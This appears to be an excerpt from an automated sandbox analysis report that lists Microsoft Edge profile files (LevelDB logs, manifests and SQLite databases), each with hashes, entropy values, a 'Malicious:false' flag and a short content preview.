                                                                                                                                                                                                                                                                                              Entropy (8bit):5.117213282176064
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:HubM+q2PN723oH+Tcwt9Eh1tIFUt8YuBiZZmw+YucNVkwON723oH+Tcwt9Eh15LJ:cvVaYeb9Eh16FUt8y/+Gz5OaYeb9Eh1H
                                                                                                                                                                                                                                                                                              MD5:A8739B448ABD75C937AF33DF65245A36
                                                                                                                                                                                                                                                                                              SHA1:3D6EC779552918F6FFFC93E985A5593376C15630
                                                                                                                                                                                                                                                                                              SHA-256:B8BC54EB8B319037E3E2028C4D754C59569CC343DB29A43ECBDA9584F6670C0A
                                                                                                                                                                                                                                                                                              SHA-512:E809D5F412871882C7198599A2C83B2F9A3BDA0A0CA12C428D5D6E39FBA392F12618FB5CA5025CDBD304C84D1EBC349840FB8FBC15CBE613A0859FE18A5F7234
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:29.396 2168 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/28-01:22:29.402 2168 Recovering log #3.2024/11/28-01:22:29.437 2168 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):340
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.117213282176064
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:HubM+q2PN723oH+Tcwt9Eh1tIFUt8YuBiZZmw+YucNVkwON723oH+Tcwt9Eh15LJ:cvVaYeb9Eh16FUt8y/+Gz5OaYeb9Eh1H
                                                                                                                                                                                                                                                                                              MD5:A8739B448ABD75C937AF33DF65245A36
                                                                                                                                                                                                                                                                                              SHA1:3D6EC779552918F6FFFC93E985A5593376C15630
                                                                                                                                                                                                                                                                                              SHA-256:B8BC54EB8B319037E3E2028C4D754C59569CC343DB29A43ECBDA9584F6670C0A
                                                                                                                                                                                                                                                                                              SHA-512:E809D5F412871882C7198599A2C83B2F9A3BDA0A0CA12C428D5D6E39FBA392F12618FB5CA5025CDBD304C84D1EBC349840FB8FBC15CBE613A0859FE18A5F7234
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:29.396 2168 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/28-01:22:29.402 2168 Recovering log #3.2024/11/28-01:22:29.437 2168 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.4622465156386871
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuUAW:TouQq3qh7z3bY2LNW9WMcUvBuUA
                                                                                                                                                                                                                                                                                              MD5:BB3CF9FC2EF105730F9B7B4A3D6718F8
                                                                                                                                                                                                                                                                                              SHA1:AB152F6422FB812CA9291745EC55176D45F78387
                                                                                                                                                                                                                                                                                              SHA-256:82DCA17112A987198CD7819E35AB9BBAAD8162B2A35803E180C5A9E66BCB66E6
                                                                                                                                                                                                                                                                                              SHA-512:BCE0ACCD20F1CE86EC6630BEE14C6AA16D672E909D252DBC816B8D07DD9DE34AEC3E09E1B0FFC4FBD10F6D647C41DB0530581826A294522DA4C3A3E841ADEEBA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                              MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                              SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                              SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                              SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0018164538716206493
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zEZl5tvl/:/M/xT02zK
                                                                                                                                                                                                                                                                                              MD5:62D45392E36171AF9107270C4E6180BB
                                                                                                                                                                                                                                                                                              SHA1:04BF369979AA44CD588323C518497DE98F223672
                                                                                                                                                                                                                                                                                              SHA-256:004896A68BD78C0619794E3FC8E44D20C1FB98694336D31BC821C97025BF9374
                                                                                                                                                                                                                                                                                              SHA-512:CF93E8DD959FC260624E6BC29DA0C745281D85BB0AAEDE312CA051638AB84A5E0AF9733B8F6364E4D385350F85FB92A71DCCB60629F49DD617A5724485264A60
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):352
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1018851615276315
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:H2Z9+q2PN723oH+TcwtnG2tMsIFUt8YY+2WZmw+YY+9VkwON723oH+TcwtnG2tM2:e9+vVaYebn9GFUt8/+J/+/+9V5OaYebB
                                                                                                                                                                                                                                                                                              MD5:66BA401D4EFDF72BB60C548F66818D34
                                                                                                                                                                                                                                                                                              SHA1:3BB4343C666E20541B3E8A451CFA0B89A21684A1
                                                                                                                                                                                                                                                                                              SHA-256:B99E74C21CE462D936DE78556BFD095F4EA3D6D4D3D8C8000128B7DCC85FFF6B
                                                                                                                                                                                                                                                                                              SHA-512:CDF4D204CE1DD2DA064A92B229102DA738FF35727538955C3BF0164B9CB1DEF8CED922D5F2A3A62107E0634974F3A9C2274CB6BC0DE38A2A410DD6C10EEFEA7D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:24.224 1e0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/28-01:22:24.225 1e0c Recovering log #3.2024/11/28-01:22:24.225 1e0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):352
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1018851615276315
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:H2Z9+q2PN723oH+TcwtnG2tMsIFUt8YY+2WZmw+YY+9VkwON723oH+TcwtnG2tM2:e9+vVaYebn9GFUt8/+J/+/+9V5OaYebB
                                                                                                                                                                                                                                                                                              MD5:66BA401D4EFDF72BB60C548F66818D34
                                                                                                                                                                                                                                                                                              SHA1:3BB4343C666E20541B3E8A451CFA0B89A21684A1
                                                                                                                                                                                                                                                                                              SHA-256:B99E74C21CE462D936DE78556BFD095F4EA3D6D4D3D8C8000128B7DCC85FFF6B
                                                                                                                                                                                                                                                                                              SHA-512:CDF4D204CE1DD2DA064A92B229102DA738FF35727538955C3BF0164B9CB1DEF8CED922D5F2A3A62107E0634974F3A9C2274CB6BC0DE38A2A410DD6C10EEFEA7D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:24.224 1e0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/28-01:22:24.225 1e0c Recovering log #3.2024/11/28-01:22:24.225 1e0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):409
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.7466133967462
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:iptA3frPgS9lN89PRTwXrDVB8WN8fRUm/YHqSIyoBSN7WnUxNSQYHJSe:T3frPN+Fpwvwvem/qVIRB6SUxNaHJ
                                                                                                                                                                                                                                                                                              MD5:E364DE4F214AE80D533E6668510D80B0
                                                                                                                                                                                                                                                                                              SHA1:CBF4588FD3C1A0FF003EA22D383ACB66CC3BFF32
                                                                                                                                                                                                                                                                                              SHA-256:68B51414453B6D741912E387158E8D822E5281A9CC113D62BE3A5987B5757F69
                                                                                                                                                                                                                                                                                              SHA-512:3CF79C9D3C69BEEC8E12E4F66437223FEF1D839D90A25E372C5859DBDA770BA9BC04DD9ACCA28221307B779F364AEE5D0484117E6F2041990212ECA013B8BDEB
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1....q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13377248552513889..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):315
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.104225135079651
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:HuV+RM1N723oH+Tcwtk2WwnvB2KLlVuFu2q2PN723oH+Tcwtk2WwnvIFUv:KusaYebkxwnvFLAJvVaYebkxwnQFUv
                                                                                                                                                                                                                                                                                              MD5:F6BB0E5C6ECEF4A5B5D5631A3742A4E2
                                                                                                                                                                                                                                                                                              SHA1:8A4B3480BB45EA967EB5FFDB8F3B4CEA0FA09491
                                                                                                                                                                                                                                                                                              SHA-256:23F6AD086A2537546084EE3899371FA5C129CF1764DF422EBD63C4FB11627EC0
                                                                                                                                                                                                                                                                                              SHA-512:14D3097E53585E1FDD9724EE741765D45A905E60BA48EA21E918E567FBFD22FF503BCE44B680C30E7D3D1DA65133CF8BF6F848D399CEC47155E1FEBB1753ECE0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:29.440 21e4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/28-01:22:29.559 21e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):399
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                              MD5:A15AC2782BB6B4407D11979316F678FD
                                                                                                                                                                                                                                                                                              SHA1:B64EAF0810E180D99B83BBA8E366B2E3416C5881
                                                                                                                                                                                                                                                                                              SHA-256:55F8FA21C3F0D42C973AEDF538F1ADE32563AE4A1E7107C939AB82B4A4D7859A
                                                                                                                                                                                                                                                                                              SHA-512:370B43C7E434C6CC9328D266C1C9DB327621E2C95AD13D953C4D63457A141FBF2BE0B35072DE96BECC29048224D3646535A149229FC2BA367C7903D3E3E79BDB
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.101117000266562
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:Hgq2PN723oH+Tcwt8aPrqIFUt8YUZmw+YUkwON723oH+Tcwt8amLJ:AvVaYebL3FUt8D/+Z5OaYebQJ
                                                                                                                                                                                                                                                                                              MD5:9E836814B8D59C5937D6A18D56DCD67D
                                                                                                                                                                                                                                                                                              SHA1:2887BC2391AAED23C9515F1C43056385A4A5EAA7
                                                                                                                                                                                                                                                                                              SHA-256:185CD4C4457D50CB19DA34B324435FA88A81569416D45BDF54632C55F4208437
                                                                                                                                                                                                                                                                                              SHA-512:9580E0BF7CDBD53AADF0B5BB36D73D92C73D2526BB05D6B19FC07A7396CF85A1F31267C2F8803EFF47B3A87C5B92D8E6787A1C42728DAAF42066608CDE82CAB9
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:24.227 1864 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/28-01:22:24.228 1864 Recovering log #3.2024/11/28-01:22:24.228 1864 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.101117000266562
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:Hgq2PN723oH+Tcwt8aPrqIFUt8YUZmw+YUkwON723oH+Tcwt8amLJ:AvVaYebL3FUt8D/+Z5OaYebQJ
                                                                                                                                                                                                                                                                                              MD5:9E836814B8D59C5937D6A18D56DCD67D
                                                                                                                                                                                                                                                                                              SHA1:2887BC2391AAED23C9515F1C43056385A4A5EAA7
                                                                                                                                                                                                                                                                                              SHA-256:185CD4C4457D50CB19DA34B324435FA88A81569416D45BDF54632C55F4208437
                                                                                                                                                                                                                                                                                              SHA-512:9580E0BF7CDBD53AADF0B5BB36D73D92C73D2526BB05D6B19FC07A7396CF85A1F31267C2F8803EFF47B3A87C5B92D8E6787A1C42728DAAF42066608CDE82CAB9
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:24.227 1864 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/28-01:22:24.228 1864 Recovering log #3.2024/11/28-01:22:24.228 1864 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):399
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                              MD5:A15AC2782BB6B4407D11979316F678FD
                                                                                                                                                                                                                                                                                              SHA1:B64EAF0810E180D99B83BBA8E366B2E3416C5881
                                                                                                                                                                                                                                                                                              SHA-256:55F8FA21C3F0D42C973AEDF538F1ADE32563AE4A1E7107C939AB82B4A4D7859A
                                                                                                                                                                                                                                                                                              SHA-512:370B43C7E434C6CC9328D266C1C9DB327621E2C95AD13D953C4D63457A141FBF2BE0B35072DE96BECC29048224D3646535A149229FC2BA367C7903D3E3E79BDB
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):332
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.162472289278152
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:Hwnq2PN723oH+Tcwt865IFUt8YMHZmw+Y3TkwON723oH+Tcwt86+ULJ:QnvVaYeb/WFUt8F/+ET5OaYeb/+SJ
                                                                                                                                                                                                                                                                                              MD5:11197ACF1A5BB31169C1BE2744D9B47B
                                                                                                                                                                                                                                                                                              SHA1:93CC80BDAE5F0CC0A45592F86CE44092AB7B2A59
                                                                                                                                                                                                                                                                                              SHA-256:27F5602E7CB2EB1F59DD22FBAB10E426430BB224553040BAFB0743257A0DCA81
                                                                                                                                                                                                                                                                                              SHA-512:12C7B232841FD6DB165A52A48CB13E368280FCD802C3490E50A2BCA389FAF1C39A6240E1C755AE8E646D0F889F4BFCAF2300B2AF1801070909B40F15601DFD99
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:24.267 1864 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/28-01:22:24.341 1864 Recovering log #3.2024/11/28-01:22:24.397 1864 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):332
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.162472289278152
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:Hwnq2PN723oH+Tcwt865IFUt8YMHZmw+Y3TkwON723oH+Tcwt86+ULJ:QnvVaYeb/WFUt8F/+ET5OaYeb/+SJ
                                                                                                                                                                                                                                                                                              MD5:11197ACF1A5BB31169C1BE2744D9B47B
                                                                                                                                                                                                                                                                                              SHA1:93CC80BDAE5F0CC0A45592F86CE44092AB7B2A59
                                                                                                                                                                                                                                                                                              SHA-256:27F5602E7CB2EB1F59DD22FBAB10E426430BB224553040BAFB0743257A0DCA81
                                                                                                                                                                                                                                                                                              SHA-512:12C7B232841FD6DB165A52A48CB13E368280FCD802C3490E50A2BCA389FAF1C39A6240E1C755AE8E646D0F889F4BFCAF2300B2AF1801070909B40F15601DFD99
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:24.267 1864 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/28-01:22:24.341 1864 Recovering log #3.2024/11/28-01:22:24.397 1864 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1197
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
                                                                                                                                                                                                                                                                                              MD5:A2A3B1383E3AAC2430F44FC7BF3E447E
                                                                                                                                                                                                                                                                                              SHA1:B807210A1205126A107A5FE25F070D2879407AA4
                                                                                                                                                                                                                                                                                              SHA-256:90685D4E050DA5B6E6F7A42A1EE21264A68F1734FD3BD4A0E044BB53791020A2
                                                                                                                                                                                                                                                                                              SHA-512:396FAB9625A2FF396222DBC86A0E2CDE724C83F3130EE099F2872AED2F2F2ECE13B0853D635F589B70BD1B5E586C05A3231D68CAF9E46B6E2DAC105A10D0A1C8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0864392825879055
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:HKfVq2PN723oH+Tcwt8NIFUt8YKnSgZmw+YKnSIkwON723oH+Tcwt8+eLJ:IvVaYebpFUt89X/+9F5OaYebqJ
                                                                                                                                                                                                                                                                                              MD5:554E32722EEBA564656D38A940CE05DF
                                                                                                                                                                                                                                                                                              SHA1:3C6E3AA9DB17EF382CF26479D383D219FA64C828
                                                                                                                                                                                                                                                                                              SHA-256:A7108FD398D3EDCCBD7D4012D6ABC422CB977E68029280A45BFFB1690B42E89B
                                                                                                                                                                                                                                                                                              SHA-512:80879057641442EC1734619A4D72BD1F8FDB2A25EFDCDBE9F5E35CB22CD2C974A906EC339427EFF4B91203AC611B9195A3377920A7540C1E3316ABCDD54E3821
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:25.014 14c4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/28-01:22:25.015 14c4 Recovering log #3.2024/11/28-01:22:25.015 14c4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
